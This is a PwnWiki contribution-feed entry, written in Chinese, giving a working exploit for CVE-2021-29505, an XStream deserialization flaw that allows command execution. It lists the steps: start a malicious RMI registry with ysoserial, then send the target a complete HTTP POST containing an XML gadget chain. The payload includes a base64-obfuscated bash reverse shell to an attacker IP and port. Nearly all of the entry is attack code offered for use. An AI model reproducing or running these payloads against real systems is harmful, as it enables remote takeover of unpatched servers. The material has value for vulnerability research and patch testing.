https://pwnwiki.com/api.php?action=feedcontributions&feedformat=atom&user=Bios
PwnWiki - User contributions [Chinese]
2026-04-04T14:15:08Z
User contributions
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Talk:Mw-mainpage-url&diff=3736
Talk:Mw-mainpage-url
2021-05-31T03:06:03Z
<p>Bios: CVE-2021-29505:XStream反序列化命令执行漏洞</p>
<hr />
<div>攻击机启动启动一个恶意的RMI Registry:<br />
java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOS8yMzMzMyAwPiYx}|{base64,-d}|{bash,-i}"<br />
工具下载链接(https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)<br />
<br />
然后对目标机器发送poc:<br />
POST / HTTP/1.1 <br />
Host: 192.168.20.129:8080 <br />
Accept-Encoding: gzip, deflate <br />
Accept: */* <br />
Accept-Language: en <br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 <br />
Connection: close <br />
Content-Type: application/xml <br />
Content-Length: 3117 <br />
<java.util.PriorityQueue serialization='custom'> <unserializable-parents/><br />
<java.util.PriorityQueue><br />
<default><br />
<size>2</size><br />
</default><br />
<int>3</int><br />
<javax.naming.ldap.Rdn_-RdnEntry><br />
<type>12345</type><br />
<value class='com.sun.org.apache.xpath.internal.objects.XString'><br />
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj><br />
</value><br />
</javax.naming.ldap.Rdn_-RdnEntry><br />
<javax.naming.ldap.Rdn_-RdnEntry><br />
<type>12345</type><br />
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'><br />
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'><br />
<parsedMessage>true</parsedMessage><br />
<soapVersion>SOAP_11</soapVersion><br />
<bodyParts/><br />
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'><br />
<attachmentsInitialized>false</attachmentsInitialized><br />
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'><br />
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'><br />
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'><br />
<names><br />
<string>aa</string><br />
<string>aa</string><br />
</names><br />
<ctx><br />
<environment/><br />
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'><br />
<java.rmi.server.RemoteObject><br />
<string>UnicastRef</string><br />
<string>192.168.20.128</string><br />
<int>1099</int><br />
<long>0</long><br />
<int>0</int><br />
<long>0</long><br />
<short>0</short><br />
<boolean>false</boolean><br />
</java.rmi.server.RemoteObject><br />
</registry><br />
<host>192.168.20.128</host><br />
<port>1099</port><br />
</ctx><br />
</candidates><br />
</aliases><br />
</nullIter><br />
</sm><br />
</message><br />
</value><br />
</javax.naming.ldap.Rdn_-RdnEntry><br />
</java.util.PriorityQueue><br />
</java.util.PriorityQueue></div>
Bios